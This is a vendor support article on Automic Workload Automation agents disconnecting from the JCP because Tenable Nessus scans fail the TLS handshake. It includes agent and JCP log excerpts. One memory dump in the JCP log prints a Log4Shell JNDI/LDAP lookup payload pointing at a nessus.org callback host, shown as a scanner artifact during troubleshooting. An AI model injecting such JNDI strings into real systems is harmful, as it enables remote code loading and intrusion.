Agent disconnects from JCP | wrong version number (SSL routines, ssl3_get_record)"'.
search cancel

Agent disconnects from JCP | wrong version number (SSL routines, ssl3_get_record)"'.

book

Article ID: 279610

calendar_today

Updated On:

Products

CA Automic Workload Automation - Automation Engine

Issue/Introduction

A windows agent regular disconnects from the JCP.  The following messages show up at the time of disconnection in the JCP log:

05 - 20240129/050249.870 - U00003406 Client connection '9(7)'  from '[External IP address]:52462' has logged on to the Server.
05 - 20240129/050249.917 - U01002200 Received an invalid message from partner '*CP005#00000009' via connection '[External IP address]:52462'.
05 - 20240129/050249.917 - U01002203 Field 'Length' in message header is invalid.
05 - 20240129/050249.917 - U00009907 Memory view 'Invalid Msg from Connection 9' (Address='00000197DE557F70', Length='85')
05 - 20240129/050249.917 -           00000000  247B6A6E 64693A6C 6461703A 2F2F6C6F  >${jndi:ldap://lo<
05 - 20240129/050249.917 -           00000010  67347368 656C6C2D 67656E65 7269632D  >g4shell-generic-<
05 - 20240129/050249.917 -           00000020  69613372 3476664A 364C5635 67654C4B  >ia3r4vfJ6LV5geLK<
05 - 20240129/050249.917 -           00000030  4A49366E 247B6C6F 7765723A 74656E7D  >JI6n${lower:ten}<
05 - 20240129/050249.917 -           00000040  2E772E6E 65737375 732E6F72 672F6E65  >.w.nessus.org/ne<
05 - 20240129/050249.917 -           00000050  73737573 7D                          >ssus}<
05 - 20240129/050249.933 - U00003407 Client connection '9(6)' from '[External IP address]:52462' has logged off from the Server.
01 - 20240129/050250.292 - 257    U00003449 Output to the TRACE file is finished.

The agent log shows messages like this at the same time:

20240129/050327.244 - U02000097 Connection with partner '[External IP address]:36524' accepted.
20240129/050327.272 - U02000327 Unexpected error on connection '[External IP address]:36524' (socket handle = '3770'), reason '"category: 'asio.ssl', (336130315) wrong version number (SSL routines, ssl3_get_record)"'.
20240129/050352.868 - U02000097 Connection with partner '[External IP address]:53698' accepted.
20240129/050352.961 - U02000327 Unexpected error on connection '[External IP address]:53698' (socket handle = '3771'), reason '"category: 'asio.ssl', (337100999) peer did not return a certificate (SSL routines, tls_process_client_certificate)"'.

Environment

Version: 21.0

Cause

A Tenable scan causes the agent to disconnect.

Resolution

The agent disconnects due to a Tenable Nessus scanning service.  When the scanning service scans the agent port, the agent tries to authenticate the connection as it requires a TLS handshake on every connection.  Since the scanning service is unable to provide a matching keystore/certificate, the agent temporarily disconnects from the JCPs.

Either an exception needs to be put in for this agent's IP and Port so it's not scanned, or the scan should run less often to lower the impacting incidents this scan will cause.